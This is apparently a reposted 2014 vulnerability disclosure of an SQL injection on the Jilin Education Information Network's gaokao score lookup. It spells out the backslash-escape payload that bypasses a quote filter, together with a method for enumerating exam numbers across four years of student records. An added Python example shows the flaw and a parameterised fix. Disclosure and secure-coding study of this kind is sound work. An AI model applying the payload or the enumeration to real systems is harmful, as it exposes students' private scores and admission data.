Serious SQL injection on the Jilin Education Information Network allows querying nearly one million gaokao score and admission records spanning 4 years
Posted on: 2014-8-14 10:39 929

News link:
News date: 2014-08-13
News body:
The URL is as follows:
If you type a single quote directly, the page responds with “输入非法注入内容” (“illegal injection content entered”), so the site does apply some simple filtering.
But they overlooked the escape character “\”.
---------------------------↑↑ (WooYun escapes a single backslash into two; all backslashes below are single ones, so strip the extra one yourself)
Suppose the SQL statement that looks up a score is something like this:
SELECT * FROM grade WHERE ksh='考号' AND xm='姓名';
If you put the escape character into the exam number, it becomes this:
SELECT * FROM grade WHERE ksh='\' AND xm='姓名';
Everything from after ksh up to before xm is then swallowed into the string, and arbitrary SQL can be constructed in the “姓名” (name) field:
SELECT * FROM grade WHERE ksh='\' AND xm=' or ksh=14220821150199#';
Don't forget the comment marker # at the end.
The SQL statement that actually executes in the end is this:
SELECT * FROM grade WHERE ksh='xxxxxxxxx' or ksh=14220821150199;
So with only the exam number, and without knowing the matching name, the score can be looked up.
Construct the following exploit:
The score is displayed.
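An added example (not part of the original report, and not the site's code) showing in Python why a filter that only rejects single quotes fails once a backslash gets through: a minimal MySQL-style literal scanner shows the AND clause being swallowed into the first string, and a parameterised query shows the fix. The table, rows and the use of sqlite3 are assumptions constructed for the demo.

```python
import sqlite3

# Constructed sample rows for the in-memory demo table (not real data).
SAMPLE_ROWS = [("14220821150199", "ZHANG SAN", 612),
               ("14220821150200", "LI SI", 587)]


def build_query_vulnerable(ksh: str, xm: str) -> str:
    """Reproduces the flawed pattern the report describes: reject a literal
    single quote, then splice the raw values straight into the SQL text."""
    if "'" in ksh or "'" in xm:
        raise ValueError("输入非法注入内容")  # the site's rejection message
    return f"SELECT * FROM grade WHERE ksh='{ksh}' AND xm='{xm}';"


def split_mysql_literals(sql: str):
    """Minimal MySQL-style scanner (single-quoted strings only, backslash
    escapes honoured). Returns (string literals, SQL text outside them),
    i.e. which characters the parser treats as data and which as code."""
    literals, outside, i, n = [], "", 0, len(sql)
    while i < n:
        if sql[i] != "'":
            outside += sql[i]
            i += 1
            continue
        j, buf = i + 1, ""
        while j < n and sql[j] != "'":
            if sql[j] == "\\" and j + 1 < n:
                j += 1          # escaped character: keep it, drop the backslash
            buf += sql[j]
            j += 1
        literals.append(buf)
        i = j + 1               # skip the closing quote
    return literals, outside


def lookup_safe(ksh: str, xm: str) -> list:
    """Hardened version: placeholders keep user input as data, so neither a
    backslash nor a '#' can change the statement's structure."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE grade (ksh TEXT, xm TEXT, score INTEGER)")
    conn.executemany("INSERT INTO grade VALUES (?, ?, ?)", SAMPLE_ROWS)
    rows = conn.execute("SELECT * FROM grade WHERE ksh=? AND xm=?",
                        (ksh, xm)).fetchall()
    conn.close()
    return rows


if __name__ == "__main__":
    q = build_query_vulnerable("\\", " or ksh=14220821150199#")
    print(q)
    print(split_mysql_literals(q))   # the AND clause is inside literals[0]
    print(lookup_safe("\\", " or ksh=14220821150199#"))  # []
```

The scanner is deliberately small (no double-quoted strings or comment handling); its point is only to show where MySQL's string boundary ends up once the backslash is in play.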

The 2014, 2013, 2012 and 2011 years all work the same way.
The next question is: where do the exam numbers come from?
Take any exam number, for example 12220822150199
It can be split like this: 12|220822|15|0199
12 means 2012, 13 corresponds to 2013, and so on
220822 is the first six digits of the ID-card number, which can be looked up online

Since the score result already contains the candidate number and name, submitting them directly returns the admission information


